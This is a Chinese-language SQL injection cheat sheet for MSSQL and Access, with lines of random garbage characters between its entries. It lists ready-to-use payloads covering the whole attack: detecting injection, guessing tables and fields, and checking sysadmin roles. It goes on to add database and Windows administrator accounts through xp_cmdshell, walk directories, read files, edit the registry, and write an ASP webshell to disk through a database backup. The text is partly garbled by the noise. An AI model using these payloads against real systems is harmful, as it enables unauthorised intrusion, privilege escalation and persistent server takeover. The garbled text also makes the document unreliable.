1.判断是否有注入;and 1=1 ;and 1=2 ,(�4K4�pN�
2.初步判断是否是mssql ;and user>0 H�.2QKws^F
�Dxxm="FQZ
3.注入参数是字符'and [查询条件] and ''=' :�yjFQ9^?&
;GhN�KP�Y�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 7)k\{�&+P
km�40q�O@3
5.判断数据库系统 ��XrPfotj1
F>cv<l
=6l
;and (select count(*) from sysobjects)>0 mssql @K]|K]c�by
*:NQ�&y*uj
;and (select count(*) from msysobjects)>0 access ���8*f�v'�
HK�r
Mim-
:�c�[L3rJl
��%[yJ4�WL
6.猜数据库 ;and (select Count(*) from [数据库名])>0 9S�-9.mvop
f9\X>zzB2|
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 JZ#[
2m�Lh
�&M��'*6A�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �[mHdG2��X
,:� �->ErP
9.(1)猜字段的ascii值(access) �(�~�en (
^�V�A�Cf|0
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 eIo�7F� �m
"T"�h�)L�<
(2)猜字段的ascii值(mssql) ##o#eZ�q:"
ow#�1="G,=
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 42{:�G��8�
;� �Hd7*`$
10.测试权限结构(mssql) 7!$^r$�t��
�-tN�UMi'�
!YJ�s]_Wr
d:�{�O�\ �
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �e!r-+.�i(
AvHCO8�h|�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- @gtQQxf��"
^�B�L"�w�k
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��2>H�2�4F
5��BJmA2L�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �e,5C8Q`Z�
/OJ`c`>Q�:
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �O<��e�{�
e����*n@�j
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- W,-g�=�6�,
*|E��[L��^
;and 1=(select IS_MEMBER('db_owner'));-- X�S �BA�$y
�uOGw9O-d9
ilv�a,WFa^
-o�.:P>�/�
11.添加mssql和系统的帐户 W"3ph6�[eW
�"x /OIf��
;exec master.dbo.sp_addlogin username;-- _Y[bMuUb=�
;exec master.dbo.sp_password null,username,password;-- [�66!�bM&
uX�q.
�]ub
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 9<)Nv�U^-r
�(Cl�k�v�
;exec master.dbo.xp_cmdshell 'net user username password ��4 N�7^?
eNu7~�3k�}
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Jdp3nzM^^@
:Xd<7��4Nu
;exec master.dbo.xp_cmdshell 'net user username password /add';-- {GcO3G�#FZ
�,i@:5X�/t
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Z87|Zl��
�>�6�pf$�0
Zoc0!�84<z
~F?u)~QZ�#
12.(1)遍历目录 !7&�5`� q7
,-e��{�(L
;create table dirs(paths varchar(100), id int) .K�<�Q��&�
ED&
`_h7?�
;insert dirs exec master.dbo.xp_dirtree 'c:\' /�Q�k��4��
9
5RBO4w%w
;and (select top 1 paths from dirs)>0 f0aKl�hEC�
�gOOPe5+ J
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) V�l�!6�W@g
��(�NnH:J`
0k(a VkZ I
1�9KQlMO.G
(2)遍历目录 �9]wN Bd�
b���,%C{mC
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- +X�YE��{E5
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ")�HFYqP>9
��~<OSYb��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 L�`E�Bfz\n
�)I�q�<+IJ
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 � {s{j~�M�
w(�TJ*::T�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �QW~1�%�`�
V}Nb�uvDB@
1|6%e�vPu(
lR6x3C
H@
13.mssql中的存储过程 p�Q�<Y:-`c
ig':%�2V�/
xp_regenumvalues 注册表根键, 子键 Oh�\<VvZuN
A7h�VHxNJ-
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 g�!z&~Z:�
^B�2��
-)
xp_regread 根键,子键,键值名 �klR�|6u]%
fLm*�1S|%\
;exec xp_regread �|WdPE�@�P
�\`\ZT�Zni
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 B i<Q=x'Z;
hz�bw�>g+
xp_regwrite 根键,子键, 值名, 值类型, 值 W�h�2tN�yS
�v�+=BC�yT
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 3�nn��J8zQ
Eue~Y�+K*b
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
}sO&�. ME
\�K]�0J�H�
xp_regdeletevalue 根键,子键,值名 ��FzXJ]�H�
)s�p�4Ie�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 h_I�D��O%�
R=��
�o2K
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 1"M]3K�l
��:e%Pvk��
1!T1�Y,�w�
=-lb��)Z"d
14.mssql的backup创建webshell {9aE��5k�R
"�djw>|,N<
use model �tlp�@�?(u
3az&�<Pqb
create table cmd(str image); b�e�^6i:��
9�lH?-~��9
insert into cmd(str) values (''); ce3YCfl�t�
�gH7|�=�W�
backup database model to disk='c:\l.asp'; 5K?ID�t7A]
*6��F[t.Or
����s1=G�;
&<U0�ZvrsH
15.mssql内置函数 -FQ 'agf@&
)Z�?�Ym.0/
;and (select @@version)>0 获得Windows的版本号 9dUra��vC7
6Yx�h9*N~]
;and user_name()='dbo' 判断当前系统的连接用户是不是sa YL��E!m��?
'9j�="�R�;
;and (select user_name())>0 爆当前系统的连接用户 /&�+tf*���
�;^�I*J:�]
;and (select db_name())>0 得到当前连接的数据库 $�.r�hRKs
�Rn��I��&8
��xJ)�n4)�
z(�^�]J`+\
16.简洁的webshell )i^<�r�;_z
vv+�z�'(�l
use model QR0Q{}wbqU
0��C6-GKbZ
create table cmd(str image); �Hi1�JLW,�
�bPt�!�yI:
insert into cmd(str) values (''); 2�M'[��,Xe
�A/KJ�qiag
backup database model to disk='g:\wwwtest\l.asp';
